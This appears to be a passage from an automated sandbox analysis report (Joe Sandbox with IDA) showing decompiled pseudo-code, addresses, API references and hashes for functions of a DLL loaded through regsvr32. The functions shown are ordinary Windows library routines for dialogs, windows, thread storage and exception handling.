				 *(_t120 - 4) = 0;
				E6DA430D0(0, _t96, _t115, _t119, _t124, 0x10);
				E6DA430D0(0, _t96, _t115, _t119, _t124, 0x3c000);
				if(_t115 == 0) {
					_t116 =  *(_t120 + 8);
					L7:
					__eflags = _t116;
					if(__eflags == 0) {
						L4:
						_t60 = 0;
						L26:
						return E6DA5C8E5(_t60);
					}
					E6DA212E0(_t120 - 0x1c);
					 *(_t120 - 4) = 1;
					 *((intOrPtr*)(_t120 - 0x18)) = 0;
					_t65 = E6DA4D516(__eflags, _t116, _t120 - 0x1c, _t120 - 0x18);
					__eflags = _t65;
					__eflags = 0 | _t65 == 0x00000000;
					if(__eflags != 0) {
						_push(_t116);
						E6DA4D4DA(0, _t120 - 0x38, _t116);
						 *(_t120 - 4) = 2;
						E6DA4D436(_t120 - 0x38,  *((intOrPtr*)(_t120 - 0x18)));
						 *(_t120 - 0x14) = E6DA4D143(_t120 - 0x38);
						 *(_t120 - 4) = 1;
						E6DA4D135(_t120 - 0x38);
						__eflags =  *(_t120 - 0x14);
						if(__eflags != 0) {
							_t116 = GlobalLock( *(_t120 - 0x14));
						}
					}
					 *(_t119 + 0x44) =  *(_t119 + 0x44) | 0xffffffff;
					 *(_t119 + 0x3c) =  *(_t119 + 0x3c) | 0x00000010;
					E6DA421CF(0, __eflags, _t119);
					_t68 =  *(_t120 + 0xc);
					__eflags = _t68;
					if(_t68 != 0) {
						_t69 =  *(_t68 + 0x20);
					} else {
						_t69 = 0;
					}
					_t117 = CreateDialogIndirectParamA( *(_t120 + 0x10), _t116, _t69, E6DA47608, 0);
					E6DA21430( *((intOrPtr*)(_t120 - 0x1c)) + 0xfffffff0);
					 *(_t120 - 4) =  *(_t120 - 4) | 0xffffffff;
					_t102 =  *(_t120 - 0x28);
					__eflags = _t102;
					if(__eflags != 0) {
						__eflags = _t117;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t102 + 0x18))(_t120 - 0x48);
							 *((intOrPtr*)( *_t119 + 0x134))(0);
						}
					}
					_t72 = E6DA406AB(0, _t117, __eflags);
					__eflags = _t72;
					if(_t72 == 0) {
						 *((intOrPtr*)( *_t119 + 0x11c))();
					}
					__eflags = _t117;
					if(_t117 != 0) {
						__eflags =  *(_t119 + 0x3c) & 0x00000010;
						if(( *(_t119 + 0x3c) & 0x00000010) == 0) {
							DestroyWindow(_t117);
							_t117 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t120 - 0x14);
					if( *(_t120 - 0x14) != 0) {
						GlobalUnlock( *(_t120 - 0x14));
						GlobalFree( *(_t120 - 0x14));
					}
					__eflags = _t117;
					_t54 = _t117 != 0;
					__eflags = _t54;
					_t60 = 0 | _t54;
					goto L26;
				}
				_push(_t120 - 0x48);
				if( *((intOrPtr*)( *_t119 + 0x134))() != 0) {
					_t116 =  *((intOrPtr*)( *_t115 + 0x14))(_t120 - 0x48,  *(_t120 + 8));
					goto L7;
				}
				goto L4;
			}

0x6da47bca
0x6da47bca
0x6da47bca
0x6da47bd1
0x6da47bd6
0x6da47bd8
0x6da47bdd
0x6da47be0
0x6da47bea
0x6da47bea
0x6da47bf2
0x6da47bf7
0x6da47bfa
0x6da47bfd
0x6da47c00
0x6da47c0a
0x6da47c11
0x6da47c3e
0x6da47c41
0x6da47c41
0x6da47c43
0x6da47c25
0x6da47c25
0x6da47d78
0x6da47d7d
0x6da47d7d
0x6da47c48
0x6da47c56
0x6da47c5a
0x6da47c5d
0x6da47c67
0x6da47c6e
0x6da47c70
0x6da47c72
0x6da47c76
0x6da47c81
0x6da47c85
0x6da47c95
0x6da47c98
0x6da47c9c
0x6da47ca1
0x6da47ca4
0x6da47caf
0x6da47caf
0x6da47ca4
0x6da47cb1
0x6da47cb5
0x6da47cba
0x6da47cbf
0x6da47cc2
0x6da47cc4
0x6da47cca
0x6da47cc6
0x6da47cc6
0x6da47cc6
0x6da47ce4
0x6da47ce6
0x6da47ceb
0x6da47d15
0x6da47d18
0x6da47d1a
0x6da47d1c
0x6da47d1e
0x6da47d26
0x6da47d2e
0x6da47d2e
0x6da47d1e
0x6da47d34
0x6da47d39
0x6da47d3b
0x6da47d41
0x6da47d41
0x6da47d47
0x6da47d49
0x6da47d4b
0x6da47d4f
0x6da47d52
0x6da47d58
0x6da47d58
0x6da47d58
0x6da47d4f
0x6da47d5a
0x6da47d5d
0x6da47d62
0x6da47d6b
0x6da47d6b
0x6da47d73
0x6da47d75
0x6da47d75
0x6da47d75
0x00000000
0x6da47d75
0x6da47c18
0x6da47c23
0x6da47c3a
0x00000000
0x6da47c3a
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 6DA47BD1
GlobalLock.KERNEL32 ref: 6DA47CA9
CreateDialogIndirectParamA.USER32(?,?,?,6DA47608,00000000), ref: 6DA47CD8
DestroyWindow.USER32 ref: 6DA47D52
GlobalUnlock.KERNEL32(?,?,00000024,6DA25FA4,00000000,616B45BB), ref: 6DA47D62
GlobalFree.KERNEL32(?), ref: 6DA47D6B

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 6e8400394e0ad97054d1b27ff9167c42e8a71a8a13d2a5d5b7eee7710f1e642f
Instruction ID: 1b85d2c0dc97bc9ddb2f98c005bd4d8a86ba2fb853b53724659d2c78791adb31
Opcode Fuzzy Hash: 6e8400394e0ad97054d1b27ff9167c42e8a71a8a13d2a5d5b7eee7710f1e642f
Instruction Fuzzy Hash: F351B135D0C24ADFCF10DFB4CA849BEBBB1AF44314F15852CE612A7290DB349A85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA54B62 Relevance: 9.1, APIs: 6, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E6DA54B62(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t103;
				intOrPtr _t121;
				void* _t123;
				void* _t124;
				void* _t125;

				_push(0x6c);
				E6DA5C80D(E6DA6EEBF, __ebx, __edi, __esi);
				_t123 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t124 - 0x14) = 0;
				 *(_t124 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L18:
					 *(_t123 + 0x44) =  *(_t123 + 0x44) & 0x00000000;
					return E6DA5C8E5(0);
				} else {
					goto L1;
				}
				do {
					L1:
					_t108 =  *(_t124 - 0x10) * 0x28;
					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x14)) + 0x24 +  *(_t124 - 0x10) * 0x28));
					if(_t76 == 0) {
						goto L17;
					}
					_t78 =  *((intOrPtr*)(_t76 + 4));
					 *((intOrPtr*)(_t124 - 0x20)) = _t78;
					if(_t78 == 0) {
						goto L17;
					}
					 *(_t124 - 0x18) =  *(_t124 - 0x14) << 4;
					do {
						_t121 =  *((intOrPtr*)(E6DA3E977(_t124 - 0x20)));
						 *((intOrPtr*)(_t124 - 0x24)) = 0xfffffffd;
						E6DA5C5A0(_t121, _t124 - 0x78, 0, 0x20);
						_t125 = _t125 + 0xc;
						E6DA4BCB2(_t124 - 0x48);
						 *(_t124 - 4) =  *(_t124 - 4) & 0x00000000;
						_t131 =  *((intOrPtr*)(_t123 + 0x48));
						if( *((intOrPtr*)(_t123 + 0x48)) == 0) {
							_t89 =  *((intOrPtr*)(_t123 + 0x40)) +  *(_t124 - 0x18);
							__eflags = _t89;
						} else {
							_t103 = E6DA54623(_t108, _t123, _t121, _t123, _t131, _t124 - 0x58,  *(_t124 - 0x10) + 1);
							 *(_t124 - 4) = 1;
							E6DA4BC8E(_t103, _t124 - 0x48, _t103);
							 *(_t124 - 4) = 0;
							__imp__#9(_t124 - 0x58);
							_t89 = _t124 - 0x48;
						}
						 *((intOrPtr*)(_t124 - 0x38)) = _t89;
						 *((intOrPtr*)(_t124 - 0x34)) = _t124 - 0x24;
						 *((intOrPtr*)(_t124 - 0x30)) = 1;
						 *((intOrPtr*)(_t124 - 0x2c)) = 1;
						 *(_t121 + 0x88) = 1;
						_t93 =  *((intOrPtr*)(_t121 + 0x50));
						if(_t93 != 0) {
							_push(_t124 - 0x1c);
							_push(0x6da79178);
							_push(_t93);
							if( *((intOrPtr*)( *_t93))() >= 0) {
								_t96 =  *((intOrPtr*)(_t124 - 0x1c));
								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t121 + 0x9c)), 0x6da791f8, 0, 4, _t124 - 0x38, 0, _t124 - 0x78, _t124 - 0x28);
								_t98 =  *((intOrPtr*)(_t124 - 0x1c));
								 *((intOrPtr*)( *_t98 + 8))(_t98);
								 *(_t121 + 0x88) =  *(_t121 + 0x88) & 0x00000000;
								if( *((intOrPtr*)(_t124 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t124 - 0x74)));
								}
								if( *((intOrPtr*)(_t124 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t124 - 0x70)));
								}
								if( *((intOrPtr*)(_t124 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t124 - 0x6c)));
								}
								 *(_t124 - 0x14) =  *(_t124 - 0x14) + 1;
								 *(_t124 - 0x18) =  *(_t124 - 0x18) + 0x10;
							}
						}
						 *(_t124 - 4) =  *(_t124 - 4) | 0xffffffff;
						__imp__#9(_t124 - 0x48);
					} while ( *((intOrPtr*)(_t124 - 0x20)) != 0);
					L17:
					 *(_t124 - 0x10) =  *(_t124 - 0x10) + 1;
				} while ( *(_t124 - 0x10) <  *((intOrPtr*)(_t123 + 0x10)));
				goto L18;
			}

0x6da54b62
0x6da54b69
0x6da54b6e
0x6da54b75
0x6da54b7c
0x6da54b7f
0x6da54b82
0x6da54ce8
0x6da54ce8
0x6da54cf3
0x00000000
0x00000000
0x00000000
0x6da54b88
0x6da54b88
0x6da54b8e
0x6da54b91
0x6da54b97
0x00000000
0x00000000
0x6da54b9d
0x6da54ba0
0x6da54ba5
0x00000000
0x00000000
0x6da54bb1
0x6da54bb4
0x6da54bc4
0x6da54bce
0x6da54bd5
0x6da54bda
0x6da54be1
0x6da54be6
0x6da54bea
0x6da54bee
0x6da54c23
0x6da54c23
0x6da54bf0
0x6da54bfb
0x6da54c04
0x6da54c08
0x6da54c11
0x6da54c15
0x6da54c1b
0x6da54c1b
0x6da54c26
0x6da54c2c
0x6da54c32
0x6da54c35
0x6da54c38
0x6da54c3e
0x6da54c43
0x6da54c4a
0x6da54c4b
0x6da54c50
0x6da54c55
0x6da54c57
0x6da54c7a
0x6da54c7d
0x6da54c83
0x6da54c86
0x6da54c91
0x6da54c96
0x6da54c96
0x6da54ca0
0x6da54ca5
0x6da54ca5
0x6da54caf
0x6da54cb4
0x6da54cb4
0x6da54cba
0x6da54cbd
0x6da54cbd
0x6da54c55
0x6da54cc1
0x6da54cc9
0x6da54ccf
0x6da54cd9
0x6da54cd9
0x6da54cdf
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 6DA54B69
VariantClear.OLEAUT32(?), ref: 6DA54C15
SysFreeString.OLEAUT32(00000000), ref: 6DA54C96
SysFreeString.OLEAUT32(00000000), ref: 6DA54CA5
SysFreeString.OLEAUT32(00000000), ref: 6DA54CB4
VariantClear.OLEAUT32(00000000), ref: 6DA54CC9

Part of subcall function 6DA54623: __EH_prolog3_GS.LIBCMT ref: 6DA5462D
Part of subcall function 6DA54623: VariantClear.OLEAUT32(?), ref: 6DA54692

Part of subcall function 6DA4BC8E: VariantCopy.OLEAUT32(?,?), ref: 6DA4BC9F

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Variant$ClearFreeString$CopyH_prolog3H_prolog3_
String ID:
API String ID: 1743954293-0
Opcode ID: 7cf2dd2ebe778539363d1c4a35f153ceea0a4f355846c45687622c19d5d332fd
Instruction ID: 5266522cd01ebb62c29533a2948c4d00513f80dff907242c38582cf7e696dff8
Opcode Fuzzy Hash: 7cf2dd2ebe778539363d1c4a35f153ceea0a4f355846c45687622c19d5d332fd
Instruction Fuzzy Hash: CD515A75D0820ADFDB10CFA4C984BEEBBB8BF48305F204519E116E7291DB75A9A5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA458DD Relevance: 9.1, APIs: 6, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA458DD(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E6DA45898();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E6DA3F1B8();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}

0x6da458ea
0x6da458f0
0x6da4590d
0x6da4591b
0x6da45926
0x6da45926
0x6da45928
0x6da4592c
0x6da45937
0x6da4593b
0x6da45948
0x6da45948
0x6da4594a
0x6da4594f
0x6da45953
0x6da45971
0x6da45964
0x6da45967
0x6da45969
0x6da45969
0x6da45953
0x6da4597a
0x00000000
0x00000000
0x00000000
0x6da4592e
0x6da4592e
0x6da4592f
0x6da45931
0x6da45933
0x00000000
0x6da4592e
0x6da45920
0x6da45922
0x6da45924
0x00000000
0x00000000
0x00000000
0x6da45924
0x6da458f2
0x6da458f9
0x6da45908
0x6da45908
0x00000000
0x6da45908
0x6da458fb
0x6da45902
0x00000000
0x00000000
0x6da45904
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 6DA45910
GetParent.USER32(?), ref: 6DA4591E
GetParent.USER32(?), ref: 6DA45931
GetLastActivePopup.USER32(?), ref: 6DA45942
IsWindowEnabled.USER32(?), ref: 6DA45956
EnableWindow.USER32(?,00000000), ref: 6DA45969

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 167351337e40ad04bbed9873ca061b5bfa7012f455ba8a47898331b64c7a5037
Instruction ID: b9ab1bd6278cb632eb10a1c3f17f173115ad9ebe49385671ce87b3bf932de79f
Opcode Fuzzy Hash: 167351337e40ad04bbed9873ca061b5bfa7012f455ba8a47898331b64c7a5037
Instruction Fuzzy Hash: C511A33A60D733A7DB220A698884B3A72BC6F46B71F19C115ED14E7246DB70CC8186D5

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A45C Relevance: 9.1, APIs: 6, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DA4A45C(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E6DA5CBC5(0, 0);
				_t22 = E6DA449D1(0, _t31, __edi, __esi, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E6DA44860(_t33);
				}
				 *(_t41 + 0xc) = _t23;
				E6DA5C5A0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E6DA5C8E5(_t28);
			}

0x6da4a45c
0x6da4a45c
0x6da4a45c
0x6da4a463
0x6da4a46d
0x6da4a479
0x6da4a47f
0x6da4a484
0x6da4a48c
0x6da4a491
0x6da4a497
0x6da4a497
0x6da4a49f
0x6da4a4b0
0x6da4a4bc
0x6da4a4c1
0x6da4a4c7
0x6da4a4ca
0x6da4a4cf
0x6da4a4d9
0x6da4a4d9
0x6da4a4dc
0x6da4a4e2
0x6da4a4ed

APIs

LeaveCriticalSection.KERNEL32(?), ref: 6DA4A463
__CxxThrowException@8.LIBCMT ref: 6DA4A46D

Part of subcall function 6DA5CBC5: RaiseException.KERNEL32(00000004,6DA213CC,6DA219BD,8007000E,00000004,6DA213CC,8007000E,?,6DA219BD,8007000E), ref: 6DA5CC07

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000), ref: 6DA4A484
LeaveCriticalSection.KERNEL32(6DA22C88,?,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000), ref: 6DA4A491

Part of subcall function 6DA44860: __CxxThrowException@8.LIBCMT ref: 6DA44876

TlsSetValue.KERNEL32(?,00000000,00000030,00000000), ref: 6DA4A4C1
LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000,00000030,00000000,?), ref: 6DA4A4E2

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue
String ID:
API String ID: 3522952025-0
Opcode ID: c7a961a1e8f9f82fe0ac165a10fbfcc7885e85f50222418b80cd15b0e34ffd38
Instruction ID: 46241a0b1876797ade842b038b2bb9c64ae3ca59d951df5a29dccc046fc5a315
Opcode Fuzzy Hash: c7a961a1e8f9f82fe0ac165a10fbfcc7885e85f50222418b80cd15b0e34ffd38
Instruction Fuzzy Hash: 7D11EDB5108305AFDB10AF60CC88D2FBBBAFF45329B11C128E656D2525CB31ECA0CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5EAA8 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E6DA5EAA8(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x6da7eb50);
				E6DA5C918(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E6DA59CDD(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E6DA5F6C8(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E6DA5F6C8(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E6DA5F6C8(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E6DA5F6C8(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E6DA59D82(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E6DA5EBCE(_t48, _t53, _t55, _t57, _t61);
				return E6DA5C95D( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x6da5eaa8
0x6da5eaa8
0x6da5eaa8
0x6da5eaaa
0x6da5eaaf
0x6da5eab4
0x6da5eab6
0x6da5eab9
0x6da5eabc
0x6da5eabf
0x6da5eac6
0x6da5ead7
0x6da5eae5
0x6da5eaf3
0x6da5eafb
0x6da5eb09
0x6da5eb0f
0x6da5eb16
0x6da5eb19
0x6da5eb2f
0x6da5eb32
0x6da5eba7
0x6da5ebae
0x6da5ebb5
0x6da5ebc2

APIs

__CreateFrameInfo.LIBCMT ref: 6DA5EAD0

Part of subcall function 6DA59CDD: __getptd.LIBCMT ref: 6DA59CEB
Part of subcall function 6DA59CDD: __getptd.LIBCMT ref: 6DA59CF9

__getptd.LIBCMT ref: 6DA5EADA

Part of subcall function 6DA5F6C8: __getptd_noexit.LIBCMT ref: 6DA5F6CB
Part of subcall function 6DA5F6C8: __amsg_exit.LIBCMT ref: 6DA5F6D8

__getptd.LIBCMT ref: 6DA5EAE8
__getptd.LIBCMT ref: 6DA5EAF6
__getptd.LIBCMT ref: 6DA5EB01
_CallCatchBlock2.LIBCMT ref: 6DA5EB27

Part of subcall function 6DA59D82: __CallSettingFrame@12.LIBCMT ref: 6DA59DCE

Part of subcall function 6DA5EBCE: __getptd.LIBCMT ref: 6DA5EBDD
Part of subcall function 6DA5EBCE: __getptd.LIBCMT ref: 6DA5EBEB

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e30c7feb693d876b1badfe7572b648f21059f4ac0e5d4aee437dbca4757ceee2
Instruction ID: 68043af87b87ab607ebee8e5086e07e91d622e01eda3a733111e71509964d75d
Opcode Fuzzy Hash: e30c7feb693d876b1badfe7572b648f21059f4ac0e5d4aee437dbca4757ceee2
Instruction Fuzzy Hash: E11119B1C08249DFDF10DFA4D644AEE7BB0FF05318F11846AE954AB261DB389AA09F50

Uniqueness

Uniqueness Score: -1.00%

Function 6DA49E15 Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E6DA49E15(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x6da49e26
0x6da49e32
0x6da49e34
0x6da49e79
0x6da49e79
0x6da49e7b
0x6da49e7f
0x00000000
0x00000000
0x6da49e45
0x6da49e5c
0x6da49e62
0x6da49e74
0x00000000
0x6da49e87
0x6da49e74
0x6da49e76
0x6da49e78
0x6da49e78
0x6da49e84

APIs

ClientToScreen.USER32(?,?), ref: 6DA49E26
GetDlgCtrlID.USER32 ref: 6DA49E3A
GetWindowLongA.USER32(00000000,000000F0), ref: 6DA49E4A
GetWindowRect.USER32 ref: 6DA49E5C
PtInRect.USER32(?,?,?), ref: 6DA49E6C
GetWindow.USER32(?,00000005), ref: 6DA49E79

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: af05548b66971c53123468fb7cdcabe604321704d5cfc06e538beeeecb8047e1
Instruction ID: 60c0ad3fb97719a0af0c28ebe3a93371f6df1ce6b89abe8dcdee9389ed02308f
Opcode Fuzzy Hash: af05548b66971c53123468fb7cdcabe604321704d5cfc06e538beeeecb8047e1
Instruction Fuzzy Hash: 78012C3A60832AABDB129B56CD09FAF3B7CAF82754F04C114F911D6090E7359A628A95

Uniqueness

Uniqueness Score: -1.00%

Function 6DA40735 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA40735(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
